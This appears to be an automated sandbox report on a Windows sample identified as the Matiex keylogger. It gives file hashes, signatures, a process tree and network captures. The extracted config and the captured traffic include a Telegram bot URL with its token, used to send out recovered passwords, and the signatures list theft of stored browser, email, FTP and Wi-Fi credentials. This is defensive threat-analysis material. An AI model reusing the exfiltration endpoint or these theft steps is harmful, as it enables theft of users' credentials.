Resubmissions
12-08-2021 13:20
210812-s5k1bdx2tj 1012-08-2021 13:06
210812-ywwkwmkmzn 1012-08-2021 12:42
210812-13ygffvy9j 1012-08-2021 12:41
210812-ph9ze8t96a 10Analysis
-
max time kernel
156s -
max time network
158s -
platform
windows11_x64 -
resource
win11 -
submitted
12-08-2021 12:41
Static task
static1
General
-
Target
g6yzl1NROz6FgZi.exe
-
Size
1.2MB
-
MD5
7a8fa3fe4b23a2ca9612b2b1cf096f6a
-
SHA1
898d020a309d30d33055978794b2131fa5a18698
-
SHA256
9dacb6e97f39f81eee74d0779165f4a74e31f27cec1a67d52c541c52ed169d73
-
SHA512
a77912743ed08c7814d6b3a7a3fea19728561f69891c862ea35957ca4886beded2ffea80342af5d9c7b45a8aa868cd8dc9edcc67b62e1b53f25d5c21be407370
Malware Config
Extracted
matiex
https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendMessage?chat_id=1735544933
Signatures
-
Matiex Main Payload 2 IoCs
resource yara_rule behavioral1/memory/4180-160-0x0000000000400000-0x0000000000476000-memory.dmp family_matiex behavioral1/memory/4180-169-0x0000000005A20000-0x0000000005FC6000-memory.dmp family_matiex -
suricata: ET MALWARE Matiex Keylogger Exfil Via Telegram
suricata: ET MALWARE Matiex Keylogger Exfil Via Telegram
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: svchost.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 checkip.dyndns.org 2 freegeoip.app 22 freegeoip.app -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4564 set thread context of 4180 4564 g6yzl1NROz6FgZi.exe 89 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp svchost.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.override svchost.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst svchost.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MoNotificationUx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MoNotificationUx.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MoNotificationUx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MoNotificationUx.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4180 g6yzl1NROz6FgZi.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeSystemEnvironmentPrivilege 4552 svchost.exe Token: SeDebugPrivilege 4180 g6yzl1NROz6FgZi.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4564 wrote to memory of 4180 4564 g6yzl1NROz6FgZi.exe 89 PID 4564 wrote to memory of 4180 4564 g6yzl1NROz6FgZi.exe 89 PID 4564 wrote to memory of 4180 4564 g6yzl1NROz6FgZi.exe 89 PID 4564 wrote to memory of 4180 4564 g6yzl1NROz6FgZi.exe 89 PID 4564 wrote to memory of 4180 4564 g6yzl1NROz6FgZi.exe 89 PID 4564 wrote to memory of 4180 4564 g6yzl1NROz6FgZi.exe 89 PID 4564 wrote to memory of 4180 4564 g6yzl1NROz6FgZi.exe 89 PID 4564 wrote to memory of 4180 4564 g6yzl1NROz6FgZi.exe 89 PID 4180 wrote to memory of 3052 4180 g6yzl1NROz6FgZi.exe 90 PID 4180 wrote to memory of 3052 4180 g6yzl1NROz6FgZi.exe 90 PID 4180 wrote to memory of 3052 4180 g6yzl1NROz6FgZi.exe 90 PID 2908 wrote to memory of 1456 2908 svchost.exe 96 PID 2908 wrote to memory of 1456 2908 svchost.exe 96 PID 1452 wrote to memory of 4016 1452 svchost.exe 100 PID 1452 wrote to memory of 4016 1452 svchost.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe"C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe"C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\SysWOW64\netsh.exe"netsh" wlan show profile3⤵PID:3052
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
C:\Windows\system32\wlrmdr.exe-c -s 0 -f 0 -t Empty -m Empty -a 0 -u Empty1⤵PID:4544
-
C:\Windows\system32\MoNotificationUx.exe%systemroot%\system32\MoNotificationUx.exe /ClearActiveNotifications1⤵
- Checks processor information in registry
PID:4632
-
C:\Windows\system32\MoNotificationUx.exe%systemroot%\system32\MoNotificationUx.exe /ClearActiveNotifications1⤵
- Checks processor information in registry
PID:4736
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.21⤵
- Modifies data under HKEY_USERS
PID:3856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:2160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:4576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\System32\pcaui.exeC:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""2⤵PID:1456
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
PID:1352
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc1⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable2⤵PID:4016
-
Network
-
Remote address:8.8.8.8:53Requestcrl3.digicert.comIN AResponsecrl3.digicert.comIN CNAMEcs9.wac.phicdn.netcs9.wac.phicdn.netIN A93.184.220.29
-
Remote address:8.8.8.8:53Requestgo.microsoft.comIN AResponsego.microsoft.comIN CNAMEgo.microsoft.com.edgekey.netgo.microsoft.com.edgekey.netIN CNAMEe11290.dspg.akamaiedge.nete11290.dspg.akamaiedge.netIN A2.18.105.186
-
Remote address:8.8.8.8:53Requestdmd.metaservices.microsoft.comIN AResponsedmd.metaservices.microsoft.comIN CNAMEdevicemetadataservice.trafficmanager.netdevicemetadataservice.trafficmanager.netIN CNAMEvmss-prod-eas.eastasia.cloudapp.azure.comvmss-prod-eas.eastasia.cloudapp.azure.comIN A20.189.118.208
-
Remote address:8.8.8.8:53Requestoneocsp.microsoft.comIN AResponseoneocsp.microsoft.comIN CNAMEoneocsp-microsoft-com.a-0003.a-msedge.netoneocsp-microsoft-com.a-0003.a-msedge.netIN CNAMEa-0003.a-msedge.neta-0003.a-msedge.netIN A204.79.197.203
-
Remote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN AResponsenexusrules.officeapps.live.comIN CNAMEprod.nexusrules.live.com.akadns.netprod.nexusrules.live.com.akadns.netIN A52.109.12.18
-
Remote address:8.8.8.8:53Requestconfig.edge.skype.comIN AResponseconfig.edge.skype.comIN CNAMEconfig.edge.skype.com.trafficmanager.netconfig.edge.skype.com.trafficmanager.netIN CNAMEl-0014.config.skype.coml-0014.config.skype.comIN CNAMEconfig-edge-skype.l-0014.l-msedge.netconfig-edge-skype.l-0014.l-msedge.netIN CNAMEl-0014.l-msedge.netl-0014.l-msedge.netIN A13.107.42.23
-
Remote address:8.8.8.8:53Requesttsfe.trafficshaping.dsp.mp.microsoft.comIN AResponsetsfe.trafficshaping.dsp.mp.microsoft.comIN CNAMEtsfe.trafficmanager.nettsfe.trafficmanager.netIN A20.54.110.119
-
Remote address:8.8.8.8:53Requestctldl.windowsupdate.comIN AResponsectldl.windowsupdate.comIN CNAMEau-bg-shim.trafficmanager.netau-bg-shim.trafficmanager.netIN CNAMEaudownload.windowsupdate.nsatc.netaudownload.windowsupdate.nsatc.netIN CNAMEau.download.windowsupdate.com.edgesuite.netau.download.windowsupdate.com.edgesuite.netIN CNAMEa767.dscg3.akamai.neta767.dscg3.akamai.netIN A95.101.78.82a767.dscg3.akamai.netIN A88.221.144.130
-
Remote address:8.8.8.8:53Requestlogin.live.comIN AResponselogin.live.comIN CNAMElogin.msa.msidentity.comlogin.msa.msidentity.comIN CNAMEwww.tm.lg.prod.aadmsa.akadns.netwww.tm.lg.prod.aadmsa.akadns.netIN CNAMEprda.aadg.msidentity.comprda.aadg.msidentity.comIN CNAMEwww.tm.a.prd.aadg.akadns.netwww.tm.a.prd.aadg.akadns.netIN A20.190.159.138www.tm.a.prd.aadg.akadns.netIN A40.126.31.143www.tm.a.prd.aadg.akadns.netIN A20.190.159.134www.tm.a.prd.aadg.akadns.netIN A20.190.159.132www.tm.a.prd.aadg.akadns.netIN A40.126.31.4www.tm.a.prd.aadg.akadns.netIN A40.126.31.135www.tm.a.prd.aadg.akadns.netIN A40.126.31.6www.tm.a.prd.aadg.akadns.netIN A40.126.31.137
-
Remote address:8.8.8.8:53Requestocsp.digicert.comIN AResponseocsp.digicert.comIN CNAMEcs9.wac.phicdn.netcs9.wac.phicdn.netIN A93.184.220.29
-
Remote address:8.8.8.8:53Requestsettings-win.data.microsoft.comIN AResponsesettings-win.data.microsoft.comIN CNAMEsettingsfd-geo.trafficmanager.netsettingsfd-geo.trafficmanager.netIN A20.73.194.208
-
Remote address:8.8.8.8:53Requestslscr.update.microsoft.comIN AResponseslscr.update.microsoft.comIN CNAMEslscr.update.microsoft.com.akadns.netslscr.update.microsoft.com.akadns.netIN CNAMEsls.update.microsoft.com.akadns.netsls.update.microsoft.com.akadns.netIN CNAMEsls.emea.update.microsoft.com.akadns.netsls.emea.update.microsoft.com.akadns.netIN A52.242.101.226
-
Remote address:8.8.8.8:53Requestfe3cr.delivery.mp.microsoft.comIN AResponsefe3cr.delivery.mp.microsoft.comIN CNAMEfe3.delivery.mp.microsoft.comfe3.delivery.mp.microsoft.comIN CNAMEfe3.delivery.dsp.mp.microsoft.com.nsatc.netfe3.delivery.dsp.mp.microsoft.com.nsatc.netIN A20.54.89.15fe3.delivery.dsp.mp.microsoft.com.nsatc.netIN A52.242.97.97
-
Remote address:8.8.8.8:53Requestfe3cr.delivery.mp.microsoft.comIN AResponsefe3cr.delivery.mp.microsoft.comIN CNAMEfe3.delivery.mp.microsoft.comfe3.delivery.mp.microsoft.comIN CNAMEfe3.delivery.dsp.mp.microsoft.com.nsatc.netfe3.delivery.dsp.mp.microsoft.com.nsatc.netIN A52.152.108.96fe3.delivery.dsp.mp.microsoft.com.nsatc.netIN A52.242.97.97
-
Remote address:8.8.8.8:53Requestslscr.update.microsoft.comIN AResponseslscr.update.microsoft.comIN CNAMEslscr.update.microsoft.com.akadns.netslscr.update.microsoft.com.akadns.netIN CNAMEsls.update.microsoft.com.akadns.netsls.update.microsoft.com.akadns.netIN CNAMEsls.emea.update.microsoft.com.akadns.netsls.emea.update.microsoft.com.akadns.netIN A40.125.122.176
-
Remote address:8.8.8.8:53Requestcheckip.dyndns.orgIN AResponsecheckip.dyndns.orgIN CNAMEcheckip.dyndns.comcheckip.dyndns.comIN A158.101.44.242checkip.dyndns.comIN A132.226.8.169checkip.dyndns.comIN A216.146.43.71checkip.dyndns.comIN A132.226.247.73checkip.dyndns.comIN A216.146.43.70checkip.dyndns.comIN A193.122.6.168checkip.dyndns.comIN A193.122.130.0
-
Remote address:8.8.8.8:53Requestfreegeoip.appIN AResponsefreegeoip.appIN A172.67.188.154freegeoip.appIN A104.21.19.200
-
Remote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220
-
Remote address:8.8.8.8:53Requestctldl.windowsupdate.comIN AResponsectldl.windowsupdate.comIN CNAMEau-bg-shim.trafficmanager.netau-bg-shim.trafficmanager.netIN CNAMEaudownload.windowsupdate.nsatc.netaudownload.windowsupdate.nsatc.netIN CNAMEwu.azureedge.netwu.azureedge.netIN CNAMEwu.ec.azureedge.netwu.ec.azureedge.netIN CNAMEwu.wpc.apr-52dd2.edgecastdns.netwu.wpc.apr-52dd2.edgecastdns.netIN CNAMEhlb.apr-52dd2-0.edgecastdns.nethlb.apr-52dd2-0.edgecastdns.netIN CNAMEcs11.wpc.v0cdn.netcs11.wpc.v0cdn.netIN A93.184.221.240
-
Remote address:8.8.8.8:53Requestfs.microsoft.comIN AResponsefs.microsoft.comIN CNAMEprod.fs.microsoft.com.akadns.netprod.fs.microsoft.com.akadns.netIN CNAMEfs-wildcard.microsoft.com.edgekey.netfs-wildcard.microsoft.com.edgekey.netIN CNAMEfs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.netfs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.netIN CNAMEe1723.g.akamaiedge.nete1723.g.akamaiedge.netIN A104.81.140.70
-
Remote address:2.18.105.186:80RequestPOST /fwlink/?LinkID=252669&clcid=0x409 HTTP/1.1
Connection: Keep-Alive
Content-Type: text/xml; charset="UTF-16LE"
User-Agent: MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT
SOAPAction: "http://schemas.microsoft.com/windowsmetadata/services/2007/09/18/dms/DeviceMetadataService/GetDeviceMetadata"
Content-Length: 2058
Host: go.microsoft.com
ResponseHTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://dmd.metaservices.microsoft.com/metadata.svc
Expires: Thu, 12 Aug 2021 12:42:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 Aug 2021 12:42:05 GMT
Connection: close
-
Remote address:20.189.118.208:80RequestPOST /metadata.svc HTTP/1.1
Connection: Keep-Alive
Content-Type: text/xml; charset="UTF-16LE"
User-Agent: MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT
SOAPAction: "http://schemas.microsoft.com/windowsmetadata/services/2007/09/18/dms/DeviceMetadataService/GetDeviceMetadata"
Content-Length: 2058
Host: dmd.metaservices.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-16LE
Content-Length: 1734
Connection: keep-alive
Cache-Control: private
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
Request-Context: appId=cid-v1:c490f1e8-2a51-43a5-b06d-d2230108e17f
Access-Control-Expose-Headers: Request-Context
X-Powered-By: ASP.NET
-
GEThttp://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3DRemote address:204.79.197.203:80RequestGET /ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3D HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 03 Aug 2021 22:13:33 GMT
If-None-Match: "6b402eed49753b33b692db60a2fd5cbce222748b2d4cf3452a45f06a41bcf15d"
User-Agent: Microsoft-CryptoAPI/10.0
Host: oneocsp.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 1763
Content-Type: application/ocsp-response
Expires: Mon, 16 Aug 2021 15:50:23 GMT
Last-Modified: Wed, 11 Aug 2021 14:13:34 GMT
ETag: "bf67479aabbc127a7498b4b6933d326f5dd795b50f266ff4285a7590a461989a"
Server: Microsoft-IIS/10.0
X-Cache: TCP_HIT
X-Powered-By: ASP.NET
x-content-type-options: nosniff
X-Azure-Ref-OriginShield: Ref A: 464A5886A8574BBA91B9115E1E2C2067 Ref B: HEL01EDGE1007 Ref C: 2021-08-12T10:56:42Z
X-MSEdge-Ref: Ref A: 166C2F1489B6493199F9A14007C4B599 Ref B: AMBEDGE0818 Ref C: 2021-08-12T12:42:05Z
Date: Thu, 12 Aug 2021 12:42:04 GMT
-
Remote address:158.101.44.242:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:158.101.44.242:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:158.101.44.242:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:158.101.44.242:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:158.101.44.242:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:172.67.188.154:443RequestGET /xml/154.61.71.51 HTTP/1.1
Host: freegeoip.app
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/xml
Content-Length: 334
Connection: keep-alive
vary: Origin
x-database-date: Thu, 16 Jul 2020 08:44:46 GMT
x-ratelimit-limit: 15000
x-ratelimit-remaining: 14996
x-ratelimit-reset: 3412
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sZwucct339OsCywDCnfhJNdiK5Y%2B451fADjtI1ANDOpdISGLYuuvoxqq4BXGEqI2%2FCxnORfXOd5AqCWgo%2FJb90Z4yslrwRVmhOry8q1uucBLStfhvgiZDpKntdznU9Gs"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 67d9c95aadf472b7-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
Remote address:172.67.188.154:443RequestGET /xml/154.61.71.51 HTTP/1.1
Host: freegeoip.app
ResponseHTTP/1.1 200 OK
Content-Type: application/xml
Content-Length: 334
Connection: keep-alive
vary: Origin
x-database-date: Thu, 16 Jul 2020 08:44:46 GMT
x-ratelimit-limit: 15000
x-ratelimit-remaining: 14995
x-ratelimit-reset: 3411
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NG%2FH6SJY2e2jYe8AdfoE7dCVY9oXqkUP89b5OrvVB%2Bx1egyc9EADHVZecuHsRai9HHUlNzWVDBUD0K0TG%2Bjbg7THK0UHYfArcKUbbTN4drhU%2BX%2BwJ748Er8%2FRgdhwu%2Bg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 67d9c9623f0272b7-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
Remote address:172.67.188.154:443RequestGET /xml/154.61.71.51 HTTP/1.1
Host: freegeoip.app
ResponseHTTP/1.1 200 OK
Content-Type: application/xml
Content-Length: 334
Connection: keep-alive
vary: Origin
x-database-date: Thu, 16 Jul 2020 08:44:46 GMT
x-ratelimit-limit: 15000
x-ratelimit-remaining: 14994
x-ratelimit-reset: 3411
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4eABrVP9MhQ35iwZCWZWpSYSF3wTvWdogzM9O5LNVF3Bp25GAKpHtdAfalP%2BbJr9aPB7nURqy0NSrDWG%2FeoLbRgwIs%2BOoJGxxcrZR23FxoaxhS1LvS20Y%2BYMHiem%2Fjtg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 67d9c9634f1972b7-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
POSThttps://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5Cg6yzl1NROz6FgZi.exeRemote address:149.154.167.220:443RequestPOST /bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8d95d540aa5daf4
Host: api.telegram.org
Content-Length: 841
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 12 Aug 2021 12:43:00 GMT
Content-Type: application/json
Content-Length: 529
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
2.7kB 588 B 7 7
HTTP Request
POST http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409HTTP Response
302 -
2.7kB 2.3kB 7 5
HTTP Request
POST http://dmd.metaservices.microsoft.com/metadata.svcHTTP Response
200 -
